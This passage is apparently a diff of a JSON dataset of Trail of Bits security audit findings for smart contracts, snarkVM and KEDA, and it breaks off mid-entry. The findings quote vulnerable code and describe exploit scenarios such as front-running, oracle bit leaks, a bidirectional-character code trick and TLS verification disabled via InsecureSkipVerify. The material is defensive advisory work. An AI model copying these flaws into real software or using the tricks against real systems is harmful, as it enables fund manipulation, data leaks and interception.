"https://github.com/trailofbits/publications/tree/master/reviews/2023-05-franklintempleton-moneymarket-securityreview.pdf", + "body": "Shareholders can prevent the admin from deauthorizing them by front-running the deauthorizeAccount function in the AuthorizationModule contract. The deauthorizeAccount function reverts if the provided account has one or more pending transactions. function deauthorizeAccount ( address account ) external override onlyRole(ROLE_AUTHORIZATION_ADMIN) { require (account != address ( 0 ), \"INVALID_ADDRESS\" ); address txModule = modules.getModuleAddress( keccak256 ( \"MODULE_TRANSACTIONAL\" ) ); require (txModule != address ( 0 ), \"MODULE_REQUIRED_NOT_FOUND\" ); require ( hasRole(ROLE_FUND_AUTHORIZED, account), \"SHAREHOLDER_DOES_NOT_EXISTS\" ); require ( !ITransactionStorage(txModule).hasTransactions(account), \"PENDING_TRANSACTIONS_EXIST\" ); _revokeRole(ROLE_FUND_AUTHORIZED, account); emit AccountDeauthorized(account); } Figure 11.1: The deauthorizeAccount function in the AuthorizationModule contract A shareholder can front-run a transaction executing the deauthorizeAccount function for their account by submitting a new transaction request to buy or sell shares. The deauthorizeAccount transaction will revert because of a pending transaction for the shareholder. Exploit Scenario Eve, a shareholder, sets up a bot to front-run all deauthorizeAccount transactions that add a new transaction request for her. As a result, all admin transactions to deauthorize Eve fail. Recommendations Short term, remove the check for the pending transactions of the provided account and consider one of the following: 1. Have the code cancel the pending transactions of the provided account in the deauthorizeAccount function. 2. Add a check in the _processSettlements function in the MoneyMarketFund contract to skip unauthorized accounts. Add the same check in the _processSettlements function in the TransferAgentModule contract. Long term, always analyze all contract functions that can be aected by attackers front-running calls to manipulate the system.", "labels": [ "Trail of Bits", "Severity: High", - "Difficulty: High" + "Difficulty: Medium" ] }, { - "title": "7. Project dependencies contain vulnerabilities ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/API3.pdf", - "body": "The execution of yarn audit identied dependencies with known vulnerabilities. Due to the sensitivity of the deployment code and its environment, it is important to ensure dependencies are not malicious. Problems with dependencies in the JavaScript community could have a signicant eect on the repositories under review. The output below details these issues. CVE ID", + "title": "12. Total number of submitters in MultiSigGenVerier contract can be more than allowed limit of MAX_SUBMITTERS ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-franklintempleton-moneymarket-securityreview.pdf", + "body": "The total number of submitters in the MultiSigGenVerifier contract can be more than the allowed limit of MAX_SUBMITTERS . The addSubmitters function in the MultiSigGenVerifier contract does not check that the total number of submitters in the submittersSet is less than the value of the MAX_SUBMITTERS constant. function addSubmitters ( address [] calldata submitters) public onlyVerifier { require (submitters.length <= MAX_SUBMITTERS, \"INVALID_ARRAY_LENGTH\" ); for ( uint256 i = 0 ; i < submitters.length; i++) { submittersSet.add(submitters[i]); } } Figure 12.1: The addSubmitters function in the MultiSigGenVerifier contract This allows the admin to add more than the maximum number of allowed submitters to the MultiSigGenVerifier contract. Recommendations Short term, add a check to the addSubmitters function to verify that the length of the submittersSet is less than or equal to the MAX_SUBMITTERS constant. Long term, document the system state machine specication and follow it to ensure proper data validation checks are added in all state-modifying functions. To ensure MAX_SUBMITTERS is never exceeded, add fuzz testing where MAX_SUBMITTERS is the system invariant under test.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Medium" + "Severity: Informational", + "Difficulty: High" ] }, { - "title": "8. DapiServer beacon data is accessible to all users ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/API3.pdf", - "body": "The lack of access controls on the conditionPspDapiUpdate function could allow an attacker to read private data on-chain. The dataPoints[] mapping contains private data that is supposed to be accessible on-chain only by whitelisted users. However, any user can call conditionPspDapiUpdate , which returns a boolean that depends on arithmetic over dataPoint : /// @notice Returns if the respective dAPI needs to be updated based on the /// condition parameters /// @dev This method does not allow the caller to indirectly read a dAPI, /// which is why it does not require the sender to be a void signer with /// zero address. [...] function conditionPspDapiUpdate( bytes32 subscriptionId, // solhint-disable-line no-unused-vars bytes calldata data, bytes calldata conditionParameters ) external override returns (bool) { bytes32 dapiId = keccak256(data); int224 currentDapiValue = dataPoints[dapiId].value; require( dapiId == updateDapiWithBeacons(abi.decode(data, (bytes32[]))), \"Data length not correct\" ); return calculateUpdateInPercentage( currentDapiValue, dataPoints[dapiId].value ) >= decodeConditionParameters(conditionParameters); } Figure 8.1: dapis/DapiServer.sol:L468-L502 An attacker could abuse this function to deduce one bit of data per call (to determine, for example, whether a users account should be liquidated). An attacker could also automate the process of accessing one bit of data to extract a larger amount of information by using a mechanism such as a dichotomic search. An attacker could therefore infer the value of dataPoin t directly on-chain. Exploit Scenario Eve, who is not whitelisted, wants to read a beacon value to determine whether a certain users account should be liquidated. Using the code provided in appendix E , she is able to conrm that the beacon value is greater than or equal to a certain threshold. Recommendations Short term, implement access controls to limit who can call conditionPspDapiUpdate . Long term, document all read and write operations related to dataPoint , and highlight their access controls. Additionally, consider implementing an o-chain monitoring system to detect any suspicious activity.", + "title": "13. Lack of contract existence check on target address ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-franklintempleton-moneymarket-securityreview.pdf", + "body": "The signedDataExecution function lacks validation to ensure that the target argument is a contract address and not an externally owned account (EOA). The absence of such a check could lead to potential security issues, particularly when executing low-level calls to an address not containing contract code. Low-level calls to an EOA return true for the success variable instead of reverting as they would with a contract address. This unexpected behavior could trigger inadvertent execution of subsequent code relying on the success variable to be accurate, potentially resulting in undesired outcomes. The onlySubmitter modier limits the potential impact of this vulnerability. function signedDataExecution( address target, bytes calldata payload, bytes calldata signatures ) external onlySubmitter { ... // Wallet logic if (acquiredThreshold >= _getRequiredThreshold(target)) { (bool success, bytes memory result) = target.call{value: 0}( payload ); emit TransactionExecuted(target, result); if (!success) { assembly { result := add(result, 0x04) } revert(abi.decode(result, (string))); } } else { revert(\"INSUFICIENT_THRESHOLD_ACQUIRED\"); } } Figure 13.1: The signedDataExecution function in the MultiSigGenVerifier contract Exploit Scenario Alice, an authorized submitter account, calls the signedDataExecution function, passing in an EOA address instead of the expected contract address. The low-level call to the target address returns successfully and does not revert. As a result, Alice thinks she has executed code but in fact has not. Recommendations Short term, integrate a contract existence check to ensure that code is present at the address passed in as the target argument. Long term, use the Slither static analyzer to catch issues such as this one. Consider integrating slither-action into the projects CI pipeline.", "labels": [ "Trail of Bits", "Severity: Low", @@ -4282,79 +6960,79 @@ ] }, { - "title": "9. Misleading function name ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/API3.pdf", - "body": "The conditionPspDapiUpdate function always updates the dataPoints storage variable (by calling updateDapiWithBeacons ), even if the function returns false (i.e., the condition for updating the variable is not met). This contradicts the code comment and the behavior implied by the functions name. /// @notice Returns if the respective dAPI needs to be updated based on the /// condition parameters [...] function conditionPspDapiUpdate( bytes32 subscriptionId, // solhint-disable-line no-unused-vars bytes calldata data, bytes calldata conditionParameters ) external override returns (bool) { bytes32 dapiId = keccak256(data); int224 currentDapiValue = dataPoints[dapiId].value; require( dapiId == updateDapiWithBeacons(abi.decode(data, (bytes32[]))), \"Data length not correct\" ); return calculateUpdateInPercentage( currentDapiValue, dataPoints[dapiId].value ) >= decodeConditionParameters(conditionParameters); } Figure 9.1: dapis/DapiServer.sol#L468-L502 Recommendations Short term, revise the documentation to inform users that a call to conditionPspDapiUpdate will update the dAPI even if the function returns false . Alternatively, develop a function similar to updateDapiWithBeacons that returns the updated value without actually updating it. Long term, ensure that functions names reect the implementation.", + "title": "14. Pending transactions can trigger a DoS ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-franklintempleton-moneymarket-securityreview.pdf", + "body": "An unbounded number of pending transactions can cause the _processSettlements function to run out of gas while trying to process them. There is no restriction on the length of pending transactions a user might have, and gas-intensive operations are performed in the for-loop of the _processSettlements function. If an account returns too many pending transactions, operations that call _processSettlements might revert with an out-of-gas error. function _processSettlements( address account, uint256 date, uint256 price ) internal whenTransactionsExist(account) { bytes32 [] memory pendingTxs = ITransactionStorage( moduleRegistry.getModuleAddress(TRANSACTIONAL_MODULE) ).getAccountTransactions(account); for ( uint256 i = 0; i < pendingTxs.length; ) { ... Figure 14.1: The pendingTxs loop in the _processSettlements function in the MoneyMarketFund contract The same issue aects the _processSettlements function in the TransferAgentModule contract. Exploit Scenario Eve submits multiple transactions to the requestSelfServiceCashPurchase function, and each creates a pending transaction record in the pendingTransactionsMap for Eves account. When settleTransactions is called with an array of accounts that includes Eve, the _processSettlements function tries to process all her pending transactions and runs out of gas in the attempt. Recommendations Short term, make the following changes to the transaction settlement ow: 1. Enhance the o-chain component of the system to identify accounts with too many pending transactions and exclude them from calls to _processSettlements ows. 2. Create another transaction settlement function that paginates over the list of pending transactions of a single account. Long term, implement thorough testing protocols for these loop structures, simulating various scenarios and edge cases that could potentially result in unbounded inputs. Ensure that all loop structures are robustly designed with safeguards in place, such as constraints and checks on input variables.", "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: High" + "Difficulty: Medium" ] }, { - "title": "1. Consoles Field and Scalar divisions panic ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "The division operation of the Field and Scalar types do not guard against a division by zero. This causes a runtime panic when values from these types are divided by zero. Figure 1.1 shows a test and the respective stack backtrace, where a None option is unconditionally unwrapped in snarkvm/fields/src/fp_256.rs : #[test] fn test_div () { let zero = Field::::zero(); // Sample a new field. let num = Field::::new(Uniform::rand(& mut test_rng())); // Divide by zero let neg = num.div(zero); } // running 1 test // thread 'arithmetic::tests::test_div' panicked at 'called `Option::unwrap()` on a `None` value', /snarkvm/fields/src/fp_256.rs:709:42 // stack backtrace: // 0: rust_begin_unwind // at /rustc/v/library/std/src/panicking.rs:584:5 // 1: core::panicking::panic_fmt // at /rustc/v/library/core/src/panicking.rs:142:14 // 2: core::panicking::panic // at /rustc/v/library/core/src/panicking.rs:48:5 // 3: core::option::Option::unwrap // at /rustc/v/library/core/src/option.rs:755:21 // 4: as core::ops::arith::DivAssign<&snarkvm_fields::fp_256::Fp256

>>::div_assign // at snarkvm/fields/src/fp_256.rs:709:26 // 5: as core::ops::arith::Div>::div // at snarkvm/fields/src/macros.rs:524:17 // 6: snarkvm_console_types_field::arithmetic::>::div // at ./src/arithmetic.rs:143: // 7: snarkvm_console_types_field::arithmetic::tests::test_div // at ./src/arithmetic.rs:305:23 Figure 1.1: Test triggering the division by zero The same issue is present in the Scalar type, which has no zero-check for other : impl Div> for Scalar { type Output = Scalar; /// Returns the `quotient` of `self` and `other`. #[inline] fn div ( self , other: Scalar ) -> Self ::Output { Scalar::new( self .scalar / other.scalar) } } Figure 1.2: console/types/scalar/src/arithmetic.rs#L137-L146 Exploit Scenario An attacker sends a zero value which is used in a division, causing a runtime error and the program to halt. Recommendations Short term, add checks to validate that the divisor is non-zero on both the Field and Scalar divisions. Long term, add tests exercising all arithmetic operations with the zero element.", + "title": "15. Dividend distribution has an incorrect rounding direction for negative rates ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-franklintempleton-moneymarket-securityreview.pdf", + "body": "The rounding direction of the dividend calculation in the _processDividends function benets the user when the dividend rate is negative, causing the fund to lose value it should retain. The division operation that computes dividend shares is rounding down in the _processDividends function of the MoneyMarketFund contract: function _processDividends ( address account , uint256 date , int256 rate , uint256 price ) internal whenHasHoldings(account) { uint256 dividendAmount = balanceOf(account) * uint256 (abs(rate)); uint256 dividendShares = dividendAmount / price; _payDividend(account, rate, dividendShares); // handle very unlikely scenario if occurs _handleNegativeYield(account, rate, dividendShares); _removeEmptyAccountFromHoldingsSet(account); emit DividendDistributed(account, date, rate, price, dividendShares); } Figure 15.1: The _processDividends function in the MoneyMarketFund contract As a result, for a negative dividend rate, the rounding benets the user by subtracting a lower number of shares from the user balance. In particular, if the rate is low and the price is high, the dividend can round down to zero. The same issue aects the _processDividends function in the TransferAgentModule contract. Exploit Scenario Eve buys a small number of shares from multiple accounts. The dividend rounds down and is equal to zero. As a result, Eve avoids the losses from the downside movement of the fund while enjoying prots from the upside. Recommendations Short term, have the _processDividends function round up the number of dividendShares for negative dividend rates. Long term, document the expected rounding direction for every arithmetic operation (see appendix G ) and follow it to ensure that rounding is always benecial to the fund. Use Echidna to nd issues arising from the wrong rounding direction.", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: High" + "Difficulty: Medium" ] }, { - "title": "2. from_xy_coordinates function lacks checks and can panic ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "Unlike Group::from_x_coordinate , the Group::from_xy_coordinates function does not enforce the resulting point to be on the elliptic curve or in the correct subgroup. Two dierent behaviors can occur depending on the underlying curve: For a short Weierstrass curve (gure 2.1), the function will always succeed and not perform any membership checks on the point; this could lead to an invalid point being used in other curve operations, potentially leading to an invalid curve attack. /// Initializes a new affine group element from the given coordinates. fn from_coordinates (coordinates: Self ::Coordinates) -> Self { let (x, y, infinity) = coordinates; Self { x, y, infinity } } Figure 2.1: No curve membership checks present at curves/src/templates/short_weierstrass_jacobian/affine.rs#L103-L107 For a twisted Edwards curve (gure 2.2), the function will panic if the point is not on the curveunlike the from_x_coordinate function, which returns an Option . /// Initializes a new affine group element from the given coordinates. fn from_coordinates (coordinates: Self ::Coordinates) -> Self { let (x, y) = coordinates; let point = Self { x, y }; assert! (point.is_on_curve()); point } Figure 2.2: curves/src/templates/twisted_edwards_extended/affine.rs#L102-L108 Exploit Scenario An attacker is able to construct an invalid point for the short Weierstrass curve, potentially revealing secrets if this point is used in scalar multiplications with secret data. Recommendations Short term, make the output type similar to the from_x_coordinate function, returning an Option . Enforce curve membership on the short Weierstrass implementation and consider returning None instead of panicking when the point is not on the twisted Edwards curve.", + "title": "1. Use of fmt.Sprintf to build host:port string ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", + "body": "Several scalers use a construct like fmt.Sprintf(\"%s:%s\", host, port) to create a host:port address string from a user-supplied host and port. This approach is problematic when the host is a literal IPv6 address, which should be enclosed in square brackets when the address is part of a resource identier. An address created using simple string concatenation, such as with fmt.Sprintf , may fail to parse when given to Go standard library functions. The following source les incorrectly use fmt.Sprintf to create an address: pkg/scalers/cassandra_scaler.go:115 pkg/scalers/mongo_scaler.go:191 pkg/scalers/mssql_scaler.go:220 pkg/scalers/mysql_scaler.go:149 pkg/scalers/predictkube_scaler.go:128 pkg/scalers/redis_scaler.go:296 pkg/scalers/redis_scaler.go:364 Recommendations Short term, use net.JoinHostPort instead of fmt.Sprintf to construct network addresses. The documentation for the net package states the following: JoinHostPort combines host and port into a network address of the form host:port . If host contains a colon, as found in literal IPv6 addresses, then JoinHostPort returns [host]:port . Long term, use Semgrep and the sprintf-host-port rule of semgrep-go to detect future instances of this issue. 2. MongoDB scaler does not encode username and password in connection string Severity: Low Diculty: Low Type: Data Validation Finding ID: TOB-KEDA-2 Target: pkg/scalers/mongo_scaler.go", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: High" + "Severity: Informational", + "Difficulty: Medium" ] }, { - "title": "3. Blake2Xs implementation fails to provide the requested number of bytes ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "The Blake2Xs implementation returns an empty byte array when the requested number of bytes is between u16::MAX-30 and u16::MAX . The Blake2Xs is an extendible-output hash function (XOF): It receives a parameter called xof_digest_length that determines how many bytes the hash function should return. When computing the necessary number of rounds, there is an integer overow if xof_digest_length is between u16::MAX-30 and u16::MAX . This integer overow causes the number of rounds to be zero and the resulting hash to have zero bytes. fn evaluate (input: & [ u8 ], xof_digest_length : u16 , persona: & [ u8 ]) -> Vec < u8 > { assert! (xof_digest_length > 0 , \"Output digest must be of non-zero length\" ); assert! (persona.len() <= 8 , \"Personalization may be at most 8 characters\" ); // Start by computing the digest of the input bytes. let xof_digest_length_node_offset = (xof_digest_length as u64 ) << 32 ; let input_digest = blake2s_simd::Params::new() .hash_length( 32 ) .node_offset(xof_digest_length_node_offset) .personal(persona) .hash(input); let mut output = vec! []; let num_rounds = ( xof_digest_length + 31 ) / 32 ; for node_offset in 0 ..num_rounds { Figure 3.1: console/algorithms/src/blake2xs/mod.rs#L32-L47 The nding is informational because the hash function is used only on the hash_to_curve routine, and never with an attacker-controlled digest length parameter. The currently used value is the size of the generator, which is not expected to reach values similar to u16::MAX . Exploit Scenario The Blake2Xs hash function is used with the maximum number of bytes, u16::MAX , to compare password hashes. Due to the vulnerability, any password will match the correct one since the hash output is always the empty array, allowing an attacker to gain access. Recommendations Short term, upcast the xof_digest_length variable to a larger type before the sum. This will prevent the overow while enforcing the u16::MAX bound on the requested digest length. 4. Blake2Xs implementations node o\u0000set denition di\u0000ers from specication Severity: Informational Diculty: High Type: Cryptography Finding ID: TOB-ALEOA-4 Target: console/algorithms/src/blake2xs/mod.rs", + "title": "3. Prometheus metrics server does not support TLS ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", + "body": "The KEDA Metrics Adapter exposes Prometheus metrics on an HTTP server listening on port 9022. Though Prometheus supports scraping metrics over TLS-enabled connections, KEDA does not oer TLS for this server. The function responsible for starting the HTTP server, prommetrics.NewServer , does so using the http.ListenAndServe function, which does not enable TLS. func (metricsServer PrometheusMetricServer) NewServer(address string , pattern string ) { http.HandleFunc( \"/healthz\" , func (w http.ResponseWriter, _ *http.Request) { w.WriteHeader(http.StatusOK) _, err := w.Write([] byte ( \"OK\" )) if err != nil { log.Fatalf( \"Unable to write to serve custom metrics: %v\" , err) } }) log.Printf( \"Starting metrics server at %v\" , address) http.Handle(pattern, promhttp.HandlerFor(registry, promhttp.HandlerOpts{})) // initialize the total error metric _, errscaler := scalerErrorsTotal.GetMetricWith(prometheus.Labels{}) if errscaler != nil { log.Fatalf( \"Unable to initialize total error metrics as : %v\" , errscaler) } log.Fatal( http.ListenAndServe(address, nil ) ) } Figure 3.1: prommetrics.NewServer exposes Prometheus metrics without TLS ( pkg/prommetrics/adapter_prommetrics.go#L82-L99 ). Exploit Scenario A user sets up KEDA with Prometheus integration, enabling the scraping of metrics on port 9022. When Prometheus makes a connection to the server, it is unencrypted, leaving both the request and response vulnerable to interception and tampering in transit. As KEDA does not support TLS for the server, the user has no way to ensure the condentiality and integrity of these metrics. Recommendations Short term, provide a ag to enable TLS for Prometheus metrics exposed by the Metrics Adapter. The usual way to enable TLS for an HTTP server is using the http.ListenAndServeTLS function.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: High" + "Severity: Low", + "Difficulty: Low" ] }, { - "title": "5. Compiling cast instructions can lead to panic ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "The output_types function of the cast instruction assumes that the number of record or interface elds equals the number of input types. // missing checks for (input_type, (_, entry_type)) in input_types.iter().skip( 2 ). zip_eq(record.entries() ) { Figure 5.1: Invocation of zip_eq on two iterators that dier in length ( cast.rs:401 ) Therefore, compiling a program with an unmatched cast instruction will cause a runtime panic. The program in gure 5.2 casts two registers into an interface type with only one eld: program aleotest.aleo; interface message: amount as u64; function test: input r0 as u64.private; cast r0 r0 into r1 as message; Figure 5.2: Program panics during compilation Figure 5.3 shows a program that will panic when compiling because it casts three registers into a record type with two elds: program aleotest.aleo; record token: owner as address.private; gates as u64.private; function test: input r0 as address.private; input r1 as u64.private; cast r0 r1 r1 into r2 as token.record; Figure 5.3: Program panics during compilation The following stack trace is printed in both cases: as core::iter::traits::iterator::Iterator>::next::h5c767bbe55881ac0 snarkvm_compiler::program::instruction::operation::cast::Cast::output_types::h3d1 251fbb81d620f snarkvm_compiler::process::stack::helpers::insert::>::check_instruction::h6bf69c769d8e877b snarkvm_compiler::process::stack::Stack::new::hb1c375f6e4331132 snarkvm_compiler::process::deploy::>::deploy::hd75a28b4fc14e19e snarkvm_fuzz::harness::fuzz_program::h131000d3e1900784 This bug was discovered through fuzzing with LibAFL . Figure 5.4: Stack trace Recommendations Short term, add a check to validate that the number of Cast arguments equals the number of record or interface elds. Long term, review all other uses of zip_eq and check the length of their iterators.", + "title": "4. Return value is dereferenced before error check ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", + "body": "After certain calls to http.NewRequestWithContext , the *Request return value is dereferenced before the error return value is checked (see the highlighted lines in gures 4.1 and 4.2). checkTokenRequest, err := http.NewRequestWithContext(ctx, \"HEAD\" , tokenURL.String(), nil ) checkTokenRequest.Header.Set( \"X-Subject-Token\" , token) checkTokenRequest.Header.Set( \"X-Auth-Token\" , token) if err != nil { return false , err } Figure 4.1: pkg/scalers/openstack/keystone_authentication.go#L118-L124 req, err := http.NewRequestWithContext(ctx, \"GET\" , url, nil ) req.SetBasicAuth(s.metadata.username, s.metadata.password) req.Header.Set( \"Origin\" , s.metadata.corsHeader) if err != nil { return - 1 , err } Figure 4.2: pkg/scalers/artemis_scaler.go#L241-L248 If an error occurred in the call to NewRequestWithContext , this behavior could result in a panic due to a nil pointer dereference. Exploit Scenario One of the calls to http.NewRequestWithContext shown in gures 4.1 and 4.2 returns an error and a nil *Request pointer. The subsequent code dereferences the nil pointer, resulting in a panic, crash, and DoS condition for the aected KEDA scaler. Recommendations Short term, check the error return value before accessing the returned *Request (e.g., by calling methods on it). Long term, use CodeQL and its go/missing-error-check query to detect future instances of this issue.", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: Low" + "Difficulty: Undetermined" ] }, { - "title": "6. Displaying an Identier can cause a panic ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "The Identifier of a program uses Fields internally. It is possible to construct an Identifier from an arbitrary bits array. However, the implementation of the Display trait of Identifier expects that this arbitrary data is valid UTF-8. Creating an identier from a bytes array already checks whether the bytes are valid UTF-8. The following formatting function tries to create a UTF-8 string regardless of the bits of the eld. fn fmt (& self , f: & mut Formatter) -> fmt :: Result { // Convert the identifier to bits. let bits_le = self . 0. to_bits_le(); // Convert the bits to bytes. let bytes = bits_le .chunks( 8 ) .map(|byte| u8 ::from_bits_le(byte).map_err(|_| fmt::Error)) .collect::< Result < Vec < u8 >, _>>()?; // Parse the bytes as a UTF-8 string. let string = String ::from_utf8(bytes).map_err(|_| fmt::Error)? ; ... } Figure 6.1: Relevant code ( parse.rs:76 ) As a result, constructing an Identifier with invalid UTF-8 bit array will cause a runtime error when the Identifier is displayed. The following test shows how to construct such an Identifier . #[test] fn test_invalid_identifier () { let invalid: & [ u8 ] = &[ 112 , 76 , 113 , 165 , 54 , 175 , 250 , 182 , 196 , 85 , 111 , 26 , 71 , 35 , 81 , 194 , 56 , 50 , 216 , 176 , 126 , 15 ]; let bits: Vec < bool > = invalid.iter().flat_map(|n| [n & ( 1 << 7 ) != 0 , n & ( 1 << 6 ) != 0 , n & ( 1 << 5 ) != 0 , n & ( 1 << 4 ) != 0 , n & ( 1 << 3 ) != 0 , n & ( 1 << 2 ) != 0 , n & ( 1 << 1 ) != 0 , n & ( 1 << 0 ) != 0 ]).collect(); let name = Identifier::from_bits_le(&bits).unwrap(); let network = Identifier::from_str( \"aleo\" ).unwrap(); let id = ProgramID::::from((name, network)); println!( \"{:?}\" , id.to_string()); } // a Display implementation returned an error unexpectedly: Error // thread 'program::tests::test_invalid_identifier' panicked at 'a Display implementation returned an error unexpectedly: Error', library/core/src/result.rs:1055:23 4: ::to_string at /rustc/dc80ca78b6ec2b6bba02560470347433bcd0bb3c/library/alloc/src/string.rs:2489:9 5: snarkvm_compiler::program::tests::test_invalid_identifier at ./src/program/mod.rs:650:26 Figure 6.2: Test causing a panic The testnet3_add_fuzz_tests branch has a workaround that prevents nding this issue. Using the arbitrary crate, it is likely that non-UTF-8 bit-strings end up in identiers. We suggest xing this bug instead of using the workaround. This bug was discovered through fuzzing with LibAFL. Recommendations Short term, we suggest using a placeholder like unprintable identifier instead of returning a formatting error. Alternatively, a check for UTF-8 could be added in the Identifier::from_bits_le .", + "title": "5. Unescaped components in PostgreSQL connection string ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", + "body": "The PostgreSQL scaler creates a connection string by formatting the congured host, port, username, database name, SSL mode, and password with fmt.Sprintf : meta.connection = fmt.Sprintf( \"host=%s port=%s user=%s dbname=%s sslmode=%s password=%s\" , host, port, userName, dbName, sslmode, password, ) Figure 5.1: pkg/scalers/postgresql_scaler.go#L127-L135 However, none of the parameters included in the format string are escaped before the call to fmt.Sprintf . According to the PostgreSQL documentation , To write an empty value, or a value containing spaces, surround it with single quotes, for example keyword = 'a value' . Single quotes and backslashes within a value must be escaped with a backslash, i.e., \\' and \\\\ . As KEDA does not perform this escaping, the connection string could fail to parse if any of the conguration parameters (e.g., the password) contains symbols with special meaning in PostgreSQL connection strings. Furthermore, this issue may allow the injection of harmful or unintended parameters into the connection string using spaces and equal signs. Although the latter attack violates assumptions about the applications behavior, it is not a severe issue in KEDAs case because users can already pass full connection strings via the connectionFromEnv conguration parameter. Exploit Scenario A user congures the PostgreSQL scaler with a password containing a space. As the PostgreSQL scaler does not escape the password in the connection string, when the client connection is initialized, the string fails to parse, an error is thrown, and the scaler does not function. Recommendations Short term, escape the user-provided PostgreSQL parameters using the method described in the PostgreSQL documentation . Long term, use the custom Semgrep rule provided in Appendix C to detect future instances of this issue.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: High" + "Severity: Low", + "Difficulty: Low" ] }, { - "title": "7. Build script causes compilation to rerun ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "Using the current working directory as a rerun condition causes unnecessary recompilations, as any change in cargos target directory will trigger a compilation. // Re-run upon any changes to the workspace. println!( \"cargo:rerun-if-changed=.\" ); Figure 7.1: Rerun condition in build.rs ( build.rs:57 ) The root build script also implements a check that all les include the proper license. However, the check is insucient to catch all cases where developers forget to include a license. Adding a new empty Rust le without modifying any other le will not make the check in the build.rs fail because the check is not re-executed. Recommendations Short term, remove the rerun condition and use the default Cargo behavior . By default cargo reruns the build.rs script if any Rust le in the source tree has changed. Long term, consider using a git commit hook to check for missing licenses at the top of les. An example of such a commit hook can be found here .", + "title": "6. Redis scalers set InsecureSkipVerify when TLS is enabled ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", + "body": "The Redis Lists scaler (of which most of the code is reused by the Redis Streams scaler) supports the enableTLS option to allow the connection to the Redis server to use Transport Layer Security (TLS). However, when creating the TLSConfig for the Redis client, the scaler assigns the InsecureSkipVerify eld to the value of enableTLS (Figure 6.1), which means that certicate and server name verication is always disabled when TLS is enabled. This allows trivial MitM attacks, rendering TLS ineective. if info.enableTLS { options.TLSConfig = &tls.Config{ InsecureSkipVerify: info.enableTLS, } } Figure 6.1: KEDA sets InsecureSkipVerify to the value of info.enableTLS , which is always true in the block above. This pattern occurs in three locations: pkg/scalers/redis_scaler.go#L472-L476 , pkg/scalers/redis_scaler.go#L496-L500 , and pkg/scalers/redis_scaler.go#L517-L521 . KEDA does not document this insecure behavior, and users likely expect that enableTLS is implemented securely to prevent MitM attacks. The only public mention of this behavior is a stale, closed issue concerning this problem on GitHub . Exploit Scenario A user deploys KEDA with the Redis Lists or Redis Streams scaler. To protect the condentiality and integrity of data in transit between KEDA and the Redis server, the user sets the enableTLS metadata eld to true . Unbeknownst to the user, KEDA has disabled TLS certicate verication, allowing attackers on the network to modify the data in transit. An adversary can then falsify metrics coming from Redis to maliciously inuence the scaling behavior of KEDA and the Kubernetes cluster (e.g., by causing a DoS). Recommendations Short term, add a warning to the public documentation that the enableTLS option, as currently implemented, is not secure. Short term, do not enable InsecureSkipVerify when the user species the enableTLS parameter. 7. Insu\u0000cient check against nil Severity: Low Diculty: High Type: Data Validation Finding ID: TOB-KEDA-7 Target: pkg/scalers/azure_eventhub_scaler.go#L253-L259", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: High", "Difficulty: High" ] }, { - "title": "8. Invisible codepoints are supported ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "The current parser allows any Unicode character in strings or comments, which can include invisible bidirectional override characters . Using such characters can lead to dierences between the code reviewed in a pull request and the compiled code. Figure 8.1 shows such a program: since r2 and r3 contain the hash of the same string, r4 is true , and r5 equals r1 , the output token has the amount eld set to the second input. However, the compiled program always returns a token with a zero amount . // Program comparing aleo with aleo string program aleotest.aleo; record token: owner as address.private; gates as u64.private; amount as u64.private; function mint: input r0 as address.private; input r1 as u64.private; hash.psd2 \"aleo\" into r2; \" into r3; hash.psd2 \"aleo // Same string again is.eq r2 r3 into r4; // r4 is true because r2 == r3 ternary r4 r1 0u64 into r5; // r5 is r1 because r4 is true cast r0 0u64 r5 into r6 as token.record; output r6 as token.record; Figure 8.1: Aleo program that evaluates unexpectedly By default, VSCode shows the Unicode characters (gure 8.2). Google Docs and GitHub display the source code as in gure 8.1. Figure 8.2: The actual source This nding is inspired by CVE-2021-42574 . Recommendations Short term, reject the following code points: U+202A, U+202B, U+202C, U+202D, U+202E, U+2066, U+2067, U+2068, U+2069. This list might not be exhaustive. Therefore, consider disabling all non-ASCII characters in the Aleo language. In the future, consider introducing escape sequences so users can still use bidirectional code points if there is a legitimate use case.", + "title": "1. Use of fmt.Sprintf to build host:port string ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", + "body": "Several scalers use a construct like fmt.Sprintf(\"%s:%s\", host, port) to create a host:port address string from a user-supplied host and port. This approach is problematic when the host is a literal IPv6 address, which should be enclosed in square brackets when the address is part of a resource identier. An address created using 